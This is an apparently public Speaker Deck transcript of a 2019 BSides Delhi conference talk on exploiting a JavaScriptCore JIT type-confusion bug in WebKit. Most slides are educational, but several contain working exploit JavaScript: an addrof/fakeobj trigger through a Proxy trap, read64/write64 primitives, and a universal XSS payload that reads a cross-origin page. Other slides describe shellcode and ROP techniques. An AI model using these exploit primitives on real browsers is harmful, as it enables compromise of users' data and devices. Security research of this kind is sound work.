Upgrade to Pro — share decks privately, control downloads, hide ads and more …

The Art of WebKit Exploitation

844e33014e005ee84df615e315915e72?s=47 Umang Raghuvanshi
October 10, 2019
Technology
2
3.4k

The Art of WebKit Exploitation

http://blog.umangis.me/the-art-of-webkit-exploitation/

As presented at BSides Delhi 2019.

844e33014e005ee84df615e315915e72?s=128

Umang Raghuvanshi

October 10, 2019
Tweet

More Decks by Umang Raghuvanshi

See All by Umang Raghuvanshi
Putting it all together: Building an iOS jailbreak from scratch
844e33014e005ee84df615e315915e72?s=48 ur0
3
2.8k

Other Decks in Technology

See All in Technology
家の明るさ制御 / Brightness Control in My House
2174bd20a68bf55c494a424ad3790f4a?s=48 1024jp
0
130
LINEスタンプの実例紹介 小さく始める障害検知・対応・振り返りの 改善プラクティス
A3966f193f4bef226a0d3e3c1f728d7f?s=48 line_developers
PRO
3
1.7k
CAMのサービス開発の歴史と共通基盤を使った 開発スタイルへの変遷について
62e3beb467ce4d447d1491263dcf8d46?s=48 ishikawa_pro
0
100
我々はなぜテストをするのか?
A64ac825509279a770c13c6fc517f11a?s=48 kawaguti
PRO
0
540
モダンデータスタックとかの話(データエンジニアのお仕事とは)
95be3c1812a3ae53c2d81cc7ea2eeb3d?s=48 foursue
0
440
Nutanix_Meetup_20220511
0fca98ba59a23fc0a4a2a53701a2bae1?s=48 keigotomomatsu
0
150
5分で完全理解するGoのiota
9c23bec5e8b0aa1d9458d40800987347?s=48 uji
3
2.1k
A1A会社紹介資料-2022-05-20
154d77627bc95f4eb226c722023b5168?s=48 a1a
2
1.1k
Data Warehouse or Data Lake, which one do I choose?
00101a1274d1f92977f4e442ef73be86?s=48 ahana
0
130
Graph API について
C0c0e8e4d7f83912cb1b1a0699df82a5?s=48 miyakemito
0
290
ソフトウェアテストで参考にしている67のモノ #scrumniigata / 67 things for software testing
405fe9ab689473f267e2cfbd95f78c75?s=48 kyonmm
PRO
1
510
Steps toward self-service operations in eureka
71929a476c581dd754e4e1f355ac07d0?s=48 fukubaka0825
0
770

Featured

See All Featured
Unsuck your backbone
B83d5b590577969ee79a5ad845411a7d?s=48 ammeep
659
55k
Testing 201, or: Great Expectations
A9704266587836f7e784235e5073b93e?s=48 jmmastey
21
5.4k
The Straight Up "How To Draw Better" Workshop
Aff5641764408271f7bc398f2097edd0?s=48 denniskardys
225
120k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
Fd55de4174accaf3b4f030e43a8a70c6?s=48 marcduiker
4
450
How to name files
0a4f62e90c976eeb44d33add75cca5af?s=48 jennybc
39
59k
Embracing the Ebb and Flow
C9b18d9dff88a9dd2393364c2b3b21bd?s=48 colly
73
3.3k
Streamline your AJAX requests with AmplifyJS and jQuery
9cde37f47e4a800ea081ea42de8d749a?s=48 dougneiner
125
8.5k
Three Pipe Problems
11c84dff30266b907714802088852677?s=48 jasonvnalue
89
8.6k
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
5b9fe87ec1faa67a4599782930f45ec9?s=48 sstephenson
151
12k
5 minutes of I Can Smell Your CMS
465724d73fe3a92c0879fdfb43a3a6f3?s=48 philhawksworth
196
18k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
A9a491b0fcbe0fbce3d64063a37add99?s=48 rmw
19
1.4k
Principles of Awesome APIs and How to Build Them.
B47b288784fda77a94aeb234ca743c24?s=48 keavy
113
15k

Transcript

  1. The Art of WebKit Exploitation

  2. @umanghere

  3. whoami • Security Researcher at SecFence, mostly iOS kernel exploitation.

    • Have released kernel exploits publicly. • Member of the Electra jailbreak team. • Also play CTFs for OpenToAll.

  4. struct Talk { 1. WebKit Walkthrough 2. The Bug 3.

    Exploitation };

  5. WebKit Walkthrough

  6. “Know thine enemy.” – Sun Tzu, The Art of War

  7. file webkit • Browser engine. • Powers Safari, MobileSafari, WebkitGTK,

    Nintendo Switch Browser, PlayStation Browser, Tesla entertainment unit and a lot more. • Long-standing browser exploitation favourite. • Receives a ton of security patches. • Gets pwned anyways.

  8. file webkit • Three major components: • WebKit Template Framework

    • WebCore • JavaScriptCore • We will target JavaScriptCore.

  9. whatis JavaScriptCore.framework • Handles JavaScript in WebKit. • Supports almost

    all of ECMAScript 6 (ES6). • Just-in-Time compilation is present on most platforms. • Over 400k lines of C++ code. • Complexity makes it a good target.

  10. Why JavaScriptCore? • Implementing scripting languages is hard. • Heap

    allocations, lifetime and state management. • Correctly implementing JavaScript is even harder. • WebCore is hardened against memory corruption.

  11. •Floats and Doubles •Integers •Pointers •Objects •Arrays

  12. let num = 13.37; • Squeezing maximum information into a

    processor word has always been a focus for almost all browser engines. To do this, the type of a particular variable is encoded into its pointer (or even into the actual value). • Historically there have been two approaches to this: • Pointer Tagging, which is used in the V8 engine, and • NaN Boxing, used in JavaScriptCore. • Floats and doubles in JavaScript are IEEE754 encoded, but during NaN boxing, a linear addition of 2^48 is done on encoding.

  13. let num = 13.37; Memory Range Type 0x0000_0000_0000_0000 — 0x0000_ffff_fffff_ffff

    ??? 0x0001_0000_0000_0000 — 0xfffe_ffff_fffff_ffff Double Precision Floats 0xffff_0000_0000_0000 — 0xffff_ffff_fffff_ffff ??? From a 64-bit perspective, any boxed value outside of
 0x0001_0000_0000_0000 - 0xfffe_ffff_ffff_ffff is NaN.

  14. let num = 13.37; Memory Range Type 0x0000_0000_0000_0000 — 0x0000_ffff_fffff_ffff

    Pointers 0x0001_0000_0000_0000 — 0xfffe_ffff_fffff_ffff Double Precision Floats 0xffff_0000_0000_0000 — 0xffff_ffff_fffff_ffff 32-bit Integers

  15. let num = 0x1337; • Since JSC only handles 32

    bit integers upto 0x7fffffff, an Int32 x is encoded by OR-ing it: 0xffff << 48 | x. • 0x0000_0000_fade_f00d => 0xffff_0000_fade_f00d. • Pointers are also encoded similarly — the top 16 bits are all zeroes. • JSC can therefore only address upto 32,768 GB of virtual memory.

  16. let bool = true; JS constant Value False 0x6 True

    0x7 Undefined 0xA Null 0x2

  17. •Floats and Doubles •Integers •Pointers •Objects •Arrays •JIT

  18. let obj = {}; • JavaScriptCore may allocate objects on

    the heap. These objects are tracked as JSObjects. • Each JSObject inherits from JSCell and optionally has a butterfly pointer. • JSCell contains important metadata about the object.

  19. class JSC::JSCell • Structure ID • Describes the ‘shape’ of

    the object. • Indexing Type • Describes how indexed properties are accessed. • JS Type • Describes the type of the object. • Flags, GC state

  20. JSObject->m_butterfly • JavaScript allows defining properties on an object. •

    let obj = {a: 1, b: 2, c: 3}; // Named properties • let array = [13.37, 13.37]; // Indexed properties • If an object has less than 6 named properties or no indexed properties, the properties are stored inline with the object. • If it has more than 6 properties or any indexed property, named and indexed properties may be stored out of line in a butterfly.

  21. JSObject->m_butterfly • A butterfly is an out-of-line object which stores

    excess named properties and all indexed properties. • The length field consists of two 32-bit integers, vectorLength and publicLength. • The butterfly pointer in a JSObject points to indexed0. indexed0 indexed1 indexed2 length named6 named7 m_butterfly

  22. JSObject->m_butterfly Indexed Properties Named Properties

  23. JSObject->m_butterfly var obj = [ ]; for (let i =

    0; i < 0x100; i++) obj[i] = i; obj.prop = 0xfade; 0xffff00000000fade m_butterfly 0x0000014d00000100 0xffff000000000000 0xffff000000000001 0xffff000000000002 length obj[0] obj[1] obj.prop

  24. JSObject->m_butterfly var obj = [ ]; for (let i =

    0; i < 0x100; i++) obj[i] = i; obj.prop = 0xfade; TAG_INT32(0xfade) m_butterfly 0x0000014d00000100 TAG_INT32(0x0000) TAG_INT32(0x0001) TAG_INT32(0x0002) length obj.prop obj[0] obj[1]

  25. •Floats and Doubles •Integers •Pointers •Objects •Arrays •JIT

  26. let array = []; • Arrays are implemented by the

    JSArray class. • The Indexing Type of the array determines how its indexed properties are accessed. • We will manipulate the Indexing Type to exploit the bug.

  27. let array = []; • let doubleArray = [13.37, 13.38,

    13.39]; // ArrayWithDouble • let intArray = [1337, 1338, 1339]; // ArrayWithInt32 • let objectArray = [{l33t: 1337}, {a: 1}]; // ArrayWithContiguous • let mixedArray = [1337, 13.37, {a: 1}]; // ArrayWithContiguous • let sparseArray = [{}, 1337, 13.37]; // ArrayWithArrayStorage
 sparseArray[1337] = {};

  28. •Floats and Doubles •Integers •Pointers •Objects •Arrays •JIT

  29. m_jit • Compiles JavaScript code into native code that can

    run directly on the processor. • Performs optimisations on emitted code. • Compiled code is inserted on-the-fly using On Stack Replacement (OSR).

  30. m_jit • Functions start execution in the low-level interpreter, LLInt.

    • Has a three-tiered Just-in-Time compiler: • Baseline JIT, • DFG JIT, • and FTL JIT. • JIT compilation is absent on some platforms.

  31. m_jit © Filip Pizlo, All About JavaScriptCore’s Many Compilers

  32. m_jit • Each level of JIT emits optimised native code.

    • Some of the optimisation consists of removing type checks. • The fewer type checks we have to face, the easier exploitation becomes.

  33. JITType::BaselineJIT • Invoked when code has ran more than 200

    times in the LLInt interpreter. • Minimal optimisations, lots of type checks, quick compile time but relatively poor performance. • Makes almost no assumptions.

  34. JITType::DFGJIT • Stands for Data Flow Graph JIT. • Invoked

    when a baseline JITted function is invoked more than 66 times, or a statement is invoked more than 1000 times. • Relatively slower than baseline JIT, code emitted is faster. • One of the key optimisations is to reduce the number of emitted type checks. • Makes some assumptions on object types.

  35. JITType::FTLJIT • Faster-Than-Light*. • Emitted code is well optimised, traditional

    compiler-like optimisations are performed. • Considerable compilation time. • Lots of type assumptions.

  36. Walkthrough Recap • NaN-boxing to encode floats, small integers and

    pointers. • Named properties for objects stored inline or out-of-line in a butterfly. • JITs make several assumptions about the variable types in the emitted code.

  37. What if we could violate these assumptions?

  38. How do we violate these assumptions?

  39. The Bug

  40. None
  41. None
  42. None

  43. Assumptions Considered Harmful • Each JIT tier builds upon several

    assumptions about argument types. • For example, a DFG JIT compiled function may assume that a variable is an array of doubles, and may even emit specialised code for that case. • In case a state change is detected by DFG or FTL JITs, they will bail out to the Baseline JIT. • Problems can arise if these assumptions are violated when the JIT believes they are still valid.

  44. Un-modelled Side Effects Considered Harmful • Functions which perform ‘dangerous’

    operations are marked as side-effecting functions, and executeEffects()/ clobberWorld() is called when they are invoked. • Changing types of variables, changing array bounds, changing prototypes, evals, etc. are considered dangerous. • Several assumptions are invalidated, most importantly those made about the types of all arrays in the graph. • If we could perform the operations without invalidating assumptions, we could trigger a type confusion. This would be considered an un-modelled side effect.

  45. 1 in obj • ECMAScript has an in operator —

    used to check if a property exists on a variable or its prototypes. • let hasOne = 1 in [ 1, 2, 3 ]; // true • DFG JIT implements this operator as the HasIndexedProperty node. • HasIndexedProperty is not (usually) considered a side effecting node.

  46. HasIndexedProperty is not considered a side effecting node But we

    can override HasIndexedProperty using a Proxy Trap.

  47. Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, { has: function() { /* Side

    Effect */ } }); let date = new Date(); date[1] = 1; let result = 1337 in date; Side effect is triggered! Makes sure that GetIndexedProperty is not a NOP

  48. Exploitation

  49. Objectives Remote Code Execution

  50. Objectives Remote Code Execution Memory Manipulation (read64/write64)

  51. Objectives Remote Code Execution Memory Manipulation (read64/write64) Engine State Manipulation

    (addrof/fakeobj)

  52. addrof & fakeobj • addrof returns the address of a

    target object. • Conversely, fakeobj materialises an object at a target address and returns it. • fakeobj does not allocate an object or write to it — it simply creates a reference to a non-existent object at the target address.

  53. let date = new Date(); date[1] = 1; let address

    = 13.37; let jitFunc = () => { doubleArray[0]; let result = 123 in date; address = doubleArray[1]; return result; } for (let i = 0; i < 0x10000; i++) jitFunc(); trigger = true; jitFunc(); print(address); Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, { has: function() { if (trigger) doubleArray[1] = obj; } }); let doubleArray = new Array(13.37, 13.37); let obj = {}; let trigger = false; Array is now ArrayWithContiguous, however, JIT compiled code still assumes it is an ArrayWithDouble. Array is an ArrayWithDouble. Prints 2.190760907e-314 (0x1084bc040) — the address of obj. Force JIT compilation.

  54. Caveat: can only trigger the side effect once.

  55. Challenge: implement addrof & fakeobj in a single shot.

  56. let object = { property_1: 1, property_2: 2, property_3: 3,

    property_4: 4, };

  57. JSObject redux Offset Contents + 0x00 JSCell Header + 0x08

    Butterfly Pointer + 0x10 1st Inline Property + 0x18 2nd Inline Property + 0x20 3rd Inline Property + 0x28 4th Inline Property Object Pointer

  58. JSObject redux Offset Contents + 0x00 JSCell Header + 0x08

    Butterfly Pointer + 0x10 1st Inline Property + 0x18 2nd Inline Property + 0x20 3rd Inline Property + 0x28 4th Inline Property Object Pointer

  59. JSObject redux Offset Contents + 0x00 JSCell Header + 0x08

    Butterfly Pointer + 0x10 Fake Butterfly Length + 0x18 Fake JSCell Header + 0x20 Fake Butterfly Pointer (Points to the fake object) + 0x28 4th Inline Property 1st Inline Property of the fake object Object Pointer

  60. JSObject redux Offset Contents + 0x00 JSCell Header + 0x08

    Butterfly Pointer + 0x10 Fake Butterfly Length + 0x18 Fake JSCell Header (IndexingType Double) + 0x20 Fake Butterfly Pointer (Points to the fake object) + 0x28 1st Inline Property of the fake object container fake

  61. addrof function addrof(object) { container.property_4 = object; return fake[2]; }

  62. fakeobj function fakeobj(address) { fake[2] = address; return container.property_4; }

  63. A Tale of Two Butterflies • Indexed properties and out

    of line properties are stored in a butterfly. • Value type is entirely controlled by IndexingType of an array. • If we can redirect a butterfly into controlled memory, we can read or mutate memory by getting or setting a property.

  64. JSCell Header Butterfly Pointer victim

  65. JSCell Header Butterfly Pointer victim JSCell Header Butterfly Pointer fakeArray

  66. JSCell Header Butterfly Pointer victim JSCell Header Butterfly Pointer fakeArray

    target +0x8 +0x10 victim.prop length victim[0]

  67. JSCell Header Butterfly Pointer victim JSCell Header Butterfly Pointer fakeArray

    target +0x8 +0x10 victim.prop length victim[0]

  68. let victim = [13.37]; victim.push(13.37); victim.prop = 13.37; let fakeArrayContainer

    = { jsCellHeader: header, // IndexingType ArrayWithDouble butterfly: victim }; let fakeArray = fakeobj(addrof(fakeArrayContainer) + 0x10);

  69. read64 function read64(address) { fakeArray[1] = address + 0x10; return

    victim.prop; }

  70. write64 function write64(address, data) { fakeArray[1] = address + 0x10;

    victim.prop = data; }

  71. Universal Cross-Site Scripting • Cross-origin requests are restricted by default

    and gated by CORS policies. • However, WebKit’s SecurityOrigin allows arbitrary cross- origin requests if the m_universalAccess boolean flag is set. • This never happens in normal operation, however, we can set it ourselves.

  72. Universal Cross-Site Scripting let xhr = new XMLHttpRequest(); const documentAddr

    = addrof(window.document); const p1 = read64(Add(documentAddr, 0x18)); const p2 = read64(Add(p1, 0xa0)); const p3 = read64(Add(p2, 0x8)); const flagAddr = Add(p3, 0x30); let flags = read64(flagAddr); flags.assignAdd(flags, 0x100); write64(flagAddr, flags); xhr.open('GET', 'https://google.com/', false); xhr.send(); document.getElementById('xss').innerText = xhr.responseText;

  73. Universal Cross-Site Scripting

  74. macOS Remote Code Execution • JIT produces native code to

    run on host processor. • Emitted code’s memory page must have RWX permissions. • We can control memory, therefore we can dump shellcode inside the JIT emitted region and execute it. • Shellcode would run within Safari’s sandbox profile.
  75. None

  76. iOS Remote Code Execution • Safari is the only* application

    which can ever create a RWX mapping on iOS. • Several access control changes on JIT pages over the past few years, such as Bulletproof JIT and APRR. • Only specialised functions can now write code to executable pages, so read64/write64 cannot dump shell code into JIT pages. • Memory access isn’t enough for RCE— control flow must be hijacked too.

  77. iOS Remote Code Execution • Return Oriented Programming is a

    code reuse attack — by manipulating a code pointer to point to a chain of gadgets, the specialised JIT writing functions can be called. • We start our ROP chain by overwriting a pointer inside a C++ object’s virtual function table (vtable). • Control Flow Integrity mitigations, such as ARMv8.3 pointer authentication can defeat ROP-based exploits (in theory).

  78. iOS Remote Code Execution • Pointer Authentication is used to

    sign sensitive pointers and small blocks of data.
 
 0x0000_0000_fade_f00d => 0x00f9_c710_fade_f00d • Function return addresses and C++ vtables are also signed. // Sign the return address in X30 with the B key and the SP as the context value. PACIBSP […] RETAB // Verify address in X30 and jump back to it. • If a signed pointer is modified or replaced with an unsigned pointer, the process will crash.

  79. iOS Remote Code Execution • Authenticated pointers can still be

    forged — if a signing gadget can be reached, ROP is possible again. • Signing gadgets may also be lost across versions. • ROP chains are extremely fragile and dependant on both the target device and version. • Attackers must have at least three variants to work around varied silicon-based mitigations across devices.

  80. Takeaways

  81. Browser engines are ridiculously complex and ever-changing.

  82. WebKit will never be perfectly secure.

  83. No software can ever be perfectly secure.

  84. Security tends to improve over time.

  85. Post exploit mitigations can shift goalposts.

  86. Exploitation will always remain a cat-and-mouse game.

  87. Software can be secure enough to make exploitation impractical.

  88. The harder exploitation gets, the more fun it is.

  89. Thanks We’re standing on the shoulders of giants.

  90. Thanks • Luca Todesco (@qwertyoruiop) • Niklas B. (@_niklasb) •

    Samuel Groß (@5aelo) • Secfence

  91. Further Reading* *Totally not an exploit link. Questions? https://blog.umangis.me/the-art-of-webkit-exploitation/ BSides

    Delhi 2019. v1.0-rc4 (96a401d2/PUB)